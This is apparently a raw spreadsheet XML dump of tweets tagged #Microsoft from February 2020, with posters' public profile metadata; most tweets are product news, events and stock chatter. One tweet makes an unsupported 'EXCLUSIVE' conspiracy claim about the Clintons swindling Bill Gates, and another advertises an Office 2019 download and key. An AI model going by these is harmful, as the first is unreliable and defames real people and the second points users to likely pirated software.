#office #microsoft #microsoftteams #sharepoint #digitaltransformation #outlook #intranet #training 
Learn more: https://t.co/3DAjEElpGz
#GNRSysTalks @GNRSystemsInc @gnrsystems https://t.co/aZHLg7VHZb</t>
  </si>
  <si>
    <t>{'id': 4868616178, 'id_str': '4868616178', 'name': 'GNRSystems, Inc.', 'screen_name': 'GNRSystemsInc', 'location': 'Herndon, VA', 'description': 'We are an IT &amp; business development company focusing on Software Development, Systems Integration, Manpower Consulting and Business transformation.', 'url': 'https://t.co/FJQSgcMftd', 'entities': {'url': {'urls': [{'url': 'https://t.co/FJQSgcMftd', 'expanded_url': 'http://www.gnrsystems.com', 'display_url': 'gnrsystems.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 131, 'friends_count': 105, 'listed_count': 6, 'created_at': 'Mon Feb 01 08:33:37 +0000 2016', 'favourites_count': 839, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 869,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'http://pbs.twimg.com/profile_images/842765397904392192/vPTPLGIm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/842765397904392192/vPTPLGIm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4868616178/1570057833',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</si>
  <si>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21:35:27 +0000 2020</t>
  </si>
  <si>
    <t>#BroadPoint Celebrates Record Earnings in 2019, Positioned as Leading #Microsoft #Dynamics365 Partner in the Washington DC Metro Area - https://t.co/4HaqcsRxJK #D365 https://t.co/R9cvpdNXHO</t>
  </si>
  <si>
    <t>{'id': 428393591, 'id_str': '428393591', 'name': 'Bryan Ray', 'screen_name': 'DynamicsFocus', 'location': 'Northern Michigan', 'description': 'DynamicsFocus, LLC. is the leading authority within the Microsoft technology environment for recruiting, staff augmentation and career development services.', 'url': 'http://t.co/Mp0In44IlQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/Mp0In44IlQ', 'expanded_url': 'http://www.dynamicsfocus.com', 'display_url': 'dynamicsfocus.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 145, 'friends_count': 15, 'listed_count': 94, 'created_at': 'Sun Dec 04 18:17:00 +0000 2011', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2826,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'http://pbs.twimg.com/profile_images/613443292802322432/_xhOhqL3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/613443292802322432/_xhOhqL3_normal.png',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</si>
  <si>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Thu Feb 27 21:32:21 +0000 2020</t>
  </si>
  <si>
    <t>Welcome to Babylon.js 4.1: https://t.co/5tceudWOr4 #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 21:32:01 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 21:30:19 +0000 2020</t>
  </si>
  <si>
    <t>Read our case studies to see how we can make #Microsoft #Office365 work for you! https://t.co/g3PdDWSkLc</t>
  </si>
  <si>
    <t>Thu Feb 27 21:21:04 +0000 2020</t>
  </si>
  <si>
    <t>Learning about secure code with @TechMike2kX  #AzSecDevOps #continuouslearning #Visug #Microsoft https://t.co/snR1pKkWfT</t>
  </si>
  <si>
    <t>{'id': 3290035191, 'id_str': '3290035191', 'name': 'Sebastiaan Tempels', 'screen_name': 'SeTeInIT', 'location': 'Belgium', 'description': 'Infrastructure consultant and architect with a passion for virtualization, cloud, storage and networking.', 'url': 'https://t.co/YBJrMM5gmG', 'entities': {'url': {'urls': [{'url': 'https://t.co/YBJrMM5gmG', 'expanded_url': 'http://sebastiaan.tempels.eu', 'display_url': 'sebastiaan.tempels.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 190, 'listed_count': 14, 'created_at': 'Tue May 19 14:36:25 +0000 2015', 'favourites_count': 250, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/847870324527988736/S3PXZIIg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/847870324527988736/S3PXZIIg_normal.jpg',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</si>
  <si>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21:20:18 +0000 2020</t>
  </si>
  <si>
    <t>EXCLUSIVE: #DOJ Blocks #FBI Investigation of Clintons SWINDLE of #BILLGATES Charity Cash; Fuming #Microsoft Mogul Duped Out of Untold Millions by #ClintonFoundation Schemes https://t.co/1drwIaqQ1z</t>
  </si>
  <si>
    <t>{'id': 17793117, 'id_str': '17793117', 'name': 'StopEndlessWar', 'screen_name': 'StopEndWarsNOW', 'location': 'Ashland, Oregon', 'description': '"There\'s a plot in this country to enslave every man, woman and child. Before I leave this High and Noble office, I intend to expose this plot."\n\n-President JFK', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 835, 'friends_count': 1911, 'listed_count': 36, 'created_at': 'Mon Dec 01 23:41:36 +0000 2008', 'favourites_count': 50712, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 37840,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'http://pbs.twimg.com/profile_images/786711525578960896/2a0v7eNd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/786711525578960896/2a0v7eNd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17793117/1476401703',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</si>
  <si>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Thu Feb 27 21:18:35 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT breaks below 50-day moving average for the first time  since October 23, 2019: https://t.co/pjgJtr4Gmj
Sentiment: Bearish #MSFT #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 21:15:14 +0000 2020</t>
  </si>
  <si>
    <t>On 29 February 2020, for ONE DAY ONLY ITProTV will open it's entire library up to anyone with a free account. So get one and see any and every #Cisco, #CompTIA, #Microsoft, #Azure, #Dev, #Office and #Security course available for that day. Sign up now!
https://t.co/D5gNu0NQ1w https://t.co/ZcH458n7wH</t>
  </si>
  <si>
    <t>{'id': 4439082862, 'id_str': '4439082862', 'name': 'Ronnie Wong', 'screen_name': 'Ronnie_ITProTV', 'location': 'Gainesville, FL ', 'description': "I'm an Edutainer @itprotv helping IT professionals learn the skills that lead to IT certifications and career advancement. I enjoy helping people.", 'url': 'https://t.co/jyxQYDNblD', 'entities': {'url': {'urls': [{'url': 'https://t.co/jyxQYDNblD', 'expanded_url': 'https://www.itpro.tv/', 'display_url': 'itpro.tv', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1621, 'friends_count': 300, 'listed_count': 18, 'created_at': 'Thu Dec 10 15:56:58 +0000 2015', 'favourites_count': 2274, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4564, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1027618445301436417/pk35V0xn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027618445301436417/pk35V0xn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4439082862/1550782234',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</si>
  <si>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21:15:06 +0000 2020</t>
  </si>
  <si>
    <t>Why wait? The top 10 things you need to know about upgrading from Skype to Teams
https://t.co/CDr7yIEseC
@MicrosoftTeams #Microsoft #MicrosoftTeams</t>
  </si>
  <si>
    <t>Thu Feb 27 21:14:14 +0000 2020</t>
  </si>
  <si>
    <t>@Pontifex visits participants of #renAIssance Conference on Artificial Intelligence @PontAcadLife  28 February 2020 at auditorium Via della conciliazione with the signing of historical agreement on AI ethics with #Microsoft #IBM #FAO #europeanparlament</t>
  </si>
  <si>
    <t>{'id': 989129852, 'id_str': '989129852', 'name': 'Jinu Jacob', 'screen_name': 'JinuJacobsedes', 'location': 'Vatican City', 'description': 'BA in Phil. MSc Phy MAComm. and Journalism Doctorate in Social Communication. Column writing in Space research.Priest &amp; disponibile for helping poor.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Tue Dec 04 16:46:40 +0000 2012', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1233052848197427200/6U6oGQ2v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233052848197427200/6U6oGQ2v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/989129852/1582817710',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</si>
  <si>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21:10:56 +0000 2020</t>
  </si>
  <si>
    <t>New feature: Private channels in #Microsoft Teams
https://t.co/d8NcleMFVB
#MicrosoftTeams</t>
  </si>
  <si>
    <t>Thu Feb 27 21:09:08 +0000 2020</t>
  </si>
  <si>
    <t>Failed to restart Polybase Data Movement service after running sp_polybase_join_group https://t.co/HGNTTifiIi #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 21:08:49 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Windows: What you need to know about what's coming next  https://t.co/oO5ORrx7WQ #Microsoft #Windows #Windows10X #PC</t>
  </si>
  <si>
    <t>Thu Feb 27 21:07:52 +0000 2020</t>
  </si>
  <si>
    <t>Does anyone know if you can #mailmerge into #outlook to send one generic email - personalised to many with dear...... to separate #email addresses #microsoft Im stumped! https://t.co/aTCt4tfdU7</t>
  </si>
  <si>
    <t>{'id': 799385153646821376, 'id_str': '799385153646821376', 'name': 'Leigh Adams', 'screen_name': 'BFILeigh', 'location': 'Farnham, England', 'description': 'Director of Education and Skills at the BFI. 20 + years experience of secondary education. All views are my own, especially if you agree/like them!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1255, 'friends_count': 1901, 'listed_count': 29, 'created_at': 'Thu Nov 17 22:54:07 +0000 2016', 'favourites_count': 3669, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3345, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/990916376213803008/jDA2oZM7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/990916376213803008/jDA2oZM7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/799385153646821376/1560958799',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</si>
  <si>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21:06:41 +0000 2020</t>
  </si>
  <si>
    <t>A new blog is on it's way  #Microsoft #powerbi</t>
  </si>
  <si>
    <t>Thu Feb 27 21:04:05 +0000 2020</t>
  </si>
  <si>
    <t>Looking forward to delivering sessions on @AzureFunctions at #TDFinland #MSTechDays in #Helsinki next week. Come check our my session on the world of #Serverless using #Microsoft @Azure @VisualStudio @VisualStudioMac https://t.co/Fwy3JIoH7X</t>
  </si>
  <si>
    <t>{'id': 33642599, 'id_str': '33642599', 'name': 'Fabian Williams ðŸ‡¯ðŸ‡²ðŸ‡ºðŸ‡¸ ðŸ‘¨ðŸ¾\u200dðŸ’»', 'screen_name': 'fabianwilliams', 'location': 'Washington, DC', 'description': '@VisualStudio MVP, @azurefunctions @Azure Dev. #MLAI i blog at https://t.co/dpHd07gF5E #Jamaican born former @USMC #homechef #motorcyclist #thoughtleader', 'url': 'https://t.co/NRLRl0Zlm3', 'entities': {'url': {'urls': [{'url': 'https://t.co/NRLRl0Zlm3', 'expanded_url': 'http://fabiangwilliams.com', 'display_url': 'fabiangwilliams.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/dpHd07gF5E', 'expanded_url': 'http://www.fabiangwilliams.com', 'display_url': 'fabiangwilliams.com', 'indices': [63, 86]}]}}, 'protected': False, 'followers_count': 6914, 'friends_count': 697, 'listed_count': 453, 'created_at': 'Mon Apr 20 20:05:22 +0000 2009', 'favourites_count': 6866, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 31595,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1225946865402892289/nnVsggCX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225946865402892289/nnVsggCX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33642599/1432735133', 'profile_link_color': '981CEB',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</si>
  <si>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Thu Feb 27 21:02:03 +0000 2020</t>
  </si>
  <si>
    <t>Join Vance in room 6 on Sat 29th at 14:30!
#ScottishSummit #Cif #solgari #Microsoft https://t.co/eVVgJefcFh</t>
  </si>
  <si>
    <t>Thu Feb 27 21:01:58 +0000 2020</t>
  </si>
  <si>
    <t>#Ignite #Microsoft #Copenhagen #Dynamics365 #PowerPlatform #CGI 
Attending Ignite the tour Copenhagen
Brilliant Power Platform sessions by @sergeluca  and @rfajdiga</t>
  </si>
  <si>
    <t>{'id': 364511226, 'id_str': '364511226', 'name': 'casper schau', 'screen_name': 'popnizzen', 'location': 'Fredericia, Danmark', 'description': 'PÃ¦dagogiske IT konsulent med speciale i alle former for sport', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 118, 'listed_count': 0, 'created_at': 'Mon Aug 29 22:03:29 +0000 2011', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1233136827923681280/3TYvSFgK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233136827923681280/3TYvSFgK_normal.jpg',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</si>
  <si>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21:00:34 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/zysjflShF4
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | @Microsoft @MSDYN365BC https://t.co/jGK9CUMdw0</t>
  </si>
  <si>
    <t>Thu Feb 27 21:00:31 +0000 2020</t>
  </si>
  <si>
    <t>Soon we will be able to interact with Yammer discussions from Outlook Web.
#microsoft365 #o365 #owa #microsoft #office365 #msftadvocate #yammer #roadmap https://t.co/qnracHPzAC</t>
  </si>
  <si>
    <t>Thu Feb 27 21:00:03 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft our employees are our greatest asset. Here's how were investing in #technology and #culture to #transform their experience.  #Microsoft #Microsoft365 https://t.co/GFAQVxyoRU</t>
  </si>
  <si>
    <t>Thu Feb 27 20:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Tessa Myers. Regional President North America @ROKAutomation asks, how do your processes need to change to extract value when it comes to transforming your plant? #EnvisionMFG #Microsoft @Microsoft</t>
  </si>
  <si>
    <t>{'id': 2303726412, 'id_str': '2303726412', 'name': 'MxD', 'screen_name': 'MxDInnovates', 'location': 'Chicago, IL', 'description': 'MxD enables U.S. manufacturers to begin making every part better than the last. MxD was formerly known as DMDII.', 'url': 'https://t.co/P08dte5BFh', 'entities': {'url': {'urls': [{'url': 'https://t.co/P08dte5BFh', 'expanded_url': 'http://mxdusa.org', 'display_url': 'mxdusa.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4436, 'friends_count': 826, 'listed_count': 255, 'created_at': 'Tue Jan 21 21:22:18 +0000 2014', 'favourites_count': 2536, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3960,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'http://pbs.twimg.com/profile_images/1101127783244333056/RZSrVVTa_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101127783244333056/RZSrVVTa_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2303726412/1551364257', 'profile_link_color': 'DA2328',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</si>
  <si>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20:52:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft To Open Azure #Cloud #Data Center Region In Spain
 #Azure #microsoft https://t.co/s3HgI1xwrS? https://t.co/4y7FtbGETD</t>
  </si>
  <si>
    <t>{'id': 491460384, 'id_str': '491460384', 'name': 'MESAlliance', 'screen_name': 'MESAlliance', 'location': '', 'description': 'Media and Entertainment Services Alliance', 'url': 'http://t.co/pGcEEiNjdl', 'entities': {'url': {'urls': [{'url': 'http://t.co/pGcEEiNjdl', 'expanded_url': 'http://mesalliance.org', 'display_url': 'mesalliance.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2358, 'friends_count': 2464, 'listed_count': 823, 'created_at': 'Mon Feb 13 17:19:23 +0000 2012', 'favourites_count': 1269, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23232,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'http://pbs.twimg.com/profile_images/2781198876/c82c4fdccf14f6ebe6c369abcebb6893_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2781198876/c82c4fdccf14f6ebe6c369abcebb6893_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/491460384/1582904312',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</si>
  <si>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20:52:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft To Open Azure #Cloud #Data Center Region In Spain ....
 #Azure #microsoft https://t.co/GzQHmE4ez4? https://t.co/mxZkizOEkH</t>
  </si>
  <si>
    <t>{'id': 2816501643, 'id_str': '2816501643', 'name': 'Smart Content News', 'screen_name': 'SmartContentNws', 'location': '', 'description': 'content intelligence for media &amp; entertainment', 'url': 'http://t.co/uTVV16AGPL', 'entities': {'url': {'urls': [{'url': 'http://t.co/uTVV16AGPL', 'expanded_url': 'http://www.smartcontentnews.com/', 'display_url': 'smartcontentnews.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 427, 'friends_count': 482, 'listed_count': 571, 'created_at': 'Wed Oct 08 19:25:41 +0000 2014', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4399,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'http://pbs.twimg.com/profile_images/958494248248033281/PeuBXptq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958494248248033281/PeuBXptq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2816501643/1446490405',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</si>
  <si>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20:50:54 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 2019 Professional Plus Download and Key 32/64 Bit  #2019 #32/64 #Download #Microsoft #office #Plus #professional https://t.co/KXPwaPjTcc</t>
  </si>
  <si>
    <t>Thu Feb 27 20:49:07 +0000 2020</t>
  </si>
  <si>
    <t>How franchise accounting software can improve your business https://t.co/SBndySA77i
#CarWashes #businesses #SelfStorage #BusinessOwners #FastFood #Franchise #Microsoft #PowerBI #Insights #Cloud #accounting #SMBs #Controllers #CFO #ERP #CRM #BetterTogether #CRMUG https://t.co/XkK2S1N6cx</t>
  </si>
  <si>
    <t>Thu Feb 27 20:47:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warned yesterday that the 'More Personal Computing' segment would likely miss its Q3 guidance due to the #coronavirus. $MSFT is fell to a support level at $160 today.  A fall of $30/share or approx 15% from the recent high of $190.70 on Feb 11. Ouch!  Will it hold? https://t.co/LGgCzFtzhS</t>
  </si>
  <si>
    <t>{'id': 1134498805133524992, 'id_str': '1134498805133524992', 'name': 'Barbara Armstrong', 'screen_name': 'BArmstrong_TDA', 'location': 'Salt Lake City, UT', 'description': 'Important Disclosures: https://t.co/B87DjqVNr9. Mom of 3. Entrepreneur. Coach. Investor. Tree hugger. Foodie. Lover of Life. Passionate about empowering others.', 'url': 'https://t.co/exzTWAq53c', 'entities': {'url': {'urls': [{'url': 'https://t.co/exzTWAq53c', 'expanded_url': 'http://www.tdameritrade.com', 'display_url': 'tdameritrade.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/B87DjqVNr9', 'expanded_url': 'http://bit.ly/1ONygeh', 'display_url': 'bit.ly/1ONygeh', 'indices': [23, 46]}]}}, 'protected': False, 'followers_count': 626, 'friends_count': 1136, 'listed_count': 8, 'created_at': 'Fri May 31 16:36:07 +0000 2019', 'favourites_count': 931, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 391, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1146130219587244032/bvF56Eud_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146130219587244032/bvF56Eud_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1134498805133524992/1562094397',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</si>
  <si>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20:46:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has pulled out of attending GDC 2020
https://t.co/8x96ilPdim #Microsoft #GDC2020 #GDC
Plans to move their presence to a digital-only event.</t>
  </si>
  <si>
    <t>{'id': 1909369290, 'id_str': '1909369290', 'name': 'RepsðŸ†™', 'screen_name': 'RepsUp100', 'location': 'Ontario, Canada', 'description': 'PC hardware and gaming enthusiast, wishlist https://t.co/oVh2vaRy8W ðŸ˜ðŸŽ best way to contact is through direct message ðŸ“©', 'url': 'https://t.co/v8J2EwfSaG', 'entities': {'url': {'urls': [{'url': 'https://t.co/v8J2EwfSaG', 'expanded_url': 'https://www.youtube.com/user/RepsUp100/', 'display_url': 'youtube.com/user/RepsUp100/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/oVh2vaRy8W', 'expanded_url': 'http://a.co/aVIcO3g', 'display_url': 'a.co/aVIcO3g', 'indices': [44, 67]}]}}, 'protected': False, 'followers_count': 6482, 'friends_count': 1638, 'listed_count': 43, 'created_at': 'Thu Sep 26 22:34:40 +0000 2013', 'favourites_count': 1605, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8649, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DD2E44', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229849726226501632/2KtIF9sz_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229849726226501632/2KtIF9sz_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1909369290/1582904763', 'profile_link_color': 'FAB81E',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</si>
  <si>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20:44:44 +0000 2020</t>
  </si>
  <si>
    <t>Check the blog to know more about the exciting specifications of the phone. (link in the bio) .
.
.
.
#google #apple #Microsoft #tech #Technology #rumour #Gossip #new #news  #smartphone #android #linux #windows #ios #developers #unveiling #MWC #techgadgets #gadgets #likeforlikes https://t.co/TQQi23SeWV</t>
  </si>
  <si>
    <t>{'id': 1232428751071219713, 'id_str': '1232428751071219713', 'name': 'The DerniÃ¨re', 'screen_name': 'Thederniere', 'location': '', 'description': 'The Tech news you would love to follow', 'url': 'https://t.co/1FFJl6dXXE', 'entities': {'url': {'urls': [{'url': 'https://t.co/1FFJl6dXXE', 'expanded_url': 'http://thederniere.wordpress.com', 'display_url': 'thederniere.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Tue Feb 25 22:15:00 +0000 2020', 'favourites_count': 3,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'http://pbs.twimg.com/profile_images/1232557656335777793/Q4z4N00m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232557656335777793/Q4z4N00m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232428751071219713/1582836380',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</si>
  <si>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20:41:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is the latest #GDC2020 cancelation over concerns about the #coronavirus. https://t.co/LDIUAVzSEb</t>
  </si>
  <si>
    <t>{'id': 36008477, 'id_str': '36008477', 'name': 'Bleeding Cool', 'screen_name': 'bleedingcool', 'location': 'Los Angeles USA To London, UK', 'description': 'Comic book, film and TV rumors, news, and info.', 'url': 'http://t.co/ZjYNjVMovE', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZjYNjVMovE', 'expanded_url': 'http://www.bleedingcool.com', 'display_url': 'bleedingcool.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80587, 'friends_count': 2283, 'listed_count': 2608, 'created_at': 'Tue Apr 28 06:33:52 +0000 2009', 'favourites_count': 121, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 163107,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/618102553713221632/vodLCsC9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/618102553713221632/vodLCsC9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36008477/1503511107',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</si>
  <si>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20:40:33 +0000 2020</t>
  </si>
  <si>
    <t>Check out our FREE March webinars! Learn what #Microsoft offerings work best to deploy a virtual machine environment, March 12th:  https://t.co/jPWfB2xcgM. Get an intro look into #Cisco's DNA center, March 19th: https://t.co/gQPyntnYpS. Save your spot now! #ITTraining https://t.co/1Bzg56NJ3U</t>
  </si>
  <si>
    <t>Thu Feb 27 20:38:57 +0000 2020</t>
  </si>
  <si>
    <t>How can I set F5 to refresh in Windows 10 PC?
#stackoverflow #microsoft #coding #programming</t>
  </si>
  <si>
    <t>{'id': 1151352352382824448, 'id_str': '1151352352382824448', 'name': 'ð”¸ð•ªð•˜ð•’', 'screen_name': 'megasrlx709', 'location': 'CanadaðŸ‡¨ðŸ‡¦', 'description': 'ð‘–ð‘šð‘ð‘œð‘Ÿð‘¡ math\n                                                                                 ðŸ•=3.1415927 sinÂ²â–¡+cosÂ²â–¡=1\nðŸ“aÂ²+bÂ²=cÂ²       2Hâ‚‚\xa0+\xa0Oâ‚‚\xa0â‡Œ\xa02Hâ‚‚OðŸš°', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 60, 'listed_count': 1, 'created_at': 'Wed Jul 17 04:46:06 +0000 2019', 'favourites_count': 48, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 178, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151352710152839170/5XK6a75p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151352710152839170/5XK6a75p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1151352352382824448/1563339443',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</si>
  <si>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20:38:22 +0000 2020</t>
  </si>
  <si>
    <t>On March 9th I will be giving an Azure Kubernetes Workshop for @Azure  in Amsterdam. Are you interested in Azure and Kubernetes? Then register via https://t.co/2vYQCd8fsu!! This course is cost-free.
#fullstaq #microsoft #azure #kubernetes #aks #opensource #cloudnative #learning</t>
  </si>
  <si>
    <t>{'id': 269884874, 'id_str': '269884874', 'name': 'Bram', 'screen_name': 'BramKlinkenberg', 'location': 'Noord-Holland, Nederland', 'description': 'Cloud Engineer | RHCE | Azure | Kubernetes | CKA | CKAD', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 344, 'listed_count': 0, 'created_at': 'Mon Mar 21 16:37:40 +0000 2011', 'favourites_count': 216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 244,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'http://pbs.twimg.com/profile_images/1174742654732685312/yHbQ1Ajq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174742654732685312/yHbQ1Ajq_normal.jpg',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</si>
  <si>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20:37:09 +0000 2020</t>
  </si>
  <si>
    <t>Now Microsoft joins the list of game tech companies who opted out of GDC (Game Developer Conference) in San Francisco scheduled for 2020.
#Microsoft #GameDeveloperConference2020 #Coronavirus https://t.co/xOgpS1L92x via @gosschips</t>
  </si>
  <si>
    <t>{'id': 1024181699008061441, 'id_str': '1024181699008061441', 'name': 'GosschipsðŸ˜‚', 'screen_name': 'gosschips', 'location': '', 'description': '', 'url': 'https://t.co/kfN3U6wsTZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/kfN3U6wsTZ', 'expanded_url': 'https://www.gosschips.com/', 'display_url': 'gosschips.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 395, 'friends_count': 137, 'listed_count': 0, 'created_at': 'Tue Jul 31 06:35:20 +0000 2018', 'favourites_count': 17805, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 782,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'http://pbs.twimg.com/profile_images/1109120537198919681/bC7Ex2_U_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109120537198919681/bC7Ex2_U_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1024181699008061441/1561612233', 'profile_link_color': 'BFA335',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</si>
  <si>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20:33:12 +0000 2020</t>
  </si>
  <si>
    <t>We will only ever teach you in small class sizes, provide you with state of the art equipment and software.
We run over 400 types of course, including #Excel #Word #AutoCAD #Microsoft #Office365.
Courses run in #Cardiff #Bridgend #Swansea and #Newport
#CPD #Education #Training https://t.co/B0blqexV1B</t>
  </si>
  <si>
    <t>Thu Feb 27 20:31:26 +0000 2020</t>
  </si>
  <si>
